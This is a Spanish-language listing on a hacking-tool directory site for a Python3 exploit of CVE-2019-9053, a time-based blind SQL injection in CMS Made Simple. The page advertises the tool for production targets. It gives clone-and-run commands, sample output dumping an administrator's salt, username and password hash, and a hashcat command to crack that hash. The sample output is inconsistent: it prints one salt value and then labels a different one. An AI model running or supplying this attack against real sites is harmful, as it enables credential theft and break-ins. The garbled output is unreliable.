Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cmsms-sqli — Exploit en Python3 para CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi). Sin dependencias, SQLi ciega basada en tiempo → volcado de credenciales de administrador. Writeup de HTB propio. | Kitploit
Herramientas/GitHubGitHub/tim-karov/cmsms-sqli
Descifrado de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de Penetración
GitHubtim-karov/cmsms-sqli

cmsms-sqli

Exploit en Python3 para CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi). Sin dependencias, SQLi ciega basada en tiempo → volcado de credenciales de administrador. Writeup de HTB propio.

Ver Repositorio
5hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CMS Made Simple <= 2.2.9 Inyección SQL (CVE-2019-9053) - Exploit en Python3

Puerto puramente en Python3 del exploit original Exploit-DB #46635 de Daniele Scanu. Inyección SQL ciega basada en tiempo para volcar credenciales de administrador de instalaciones vulnerables de CMS Made Simple.

🎯 Características:

✅ Sin dependencias externas (solo requests)

✅ Nativo en Python 3.6+ (f-strings, operador walrus)

✅ Salida coloreada y atractiva (ANSI)

✅ Estable y rápido (volcado en ~3-5 min con conexiones promedio)

✅ Manejo de tiempos de espera/errores para objetivos en producción

✅ Salida lista para Hashcat (formato salt + MD5)

🚀 Uso:

root@kitploit:~
# Clone & run
git clone https://github.com/tim-karov/cmsms-sqli
cd cmsms-sqli
python3 cmsms-sqli.py url
root@kitploit:~
# Example output (HTB Writeup):
[+] CVE-2019-9053 CMS Made Simple SQLi (Python3)
[+] Target: http://machine_ip/writeup/moduleinterface.php?mact=News,m1_,default,0
[+] Dumping SALT...
5a599ef579066807
[+] Salt: L7b8v5p3
[+] Dumping USERNAME...
jkr
[+] Username: jkr
[+] Dumping PASSWORD MD5...
62def4866937f08cc13bab43bb14e6f7
[+] MD5 Hash: 62def4866937f08cc13bab43bb14e6f7
[+] Crack: hashcat -a 0 -m 20 '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' /usr/share/wordlists/rockyou.txt

🔧 Personalización:

root@kitploit:~
TIME = 3      # Sleep time (slower = more stable)
timeout = 20  # Request timeout
chars = '...' # Custom charset

📝 Créditos:

Autor original: Daniele Scanu

Exploit-DB: #46635

Puerto a Python3 y mejoras: Tim Karov

📄 Licencia:

Licencia MIT - Ver LICENSE


⭐ ¡Deja una estrella si te resulta útil! Usado en laboratorios de HTB/TryHackMe y pentests reales.

Descargar herramienta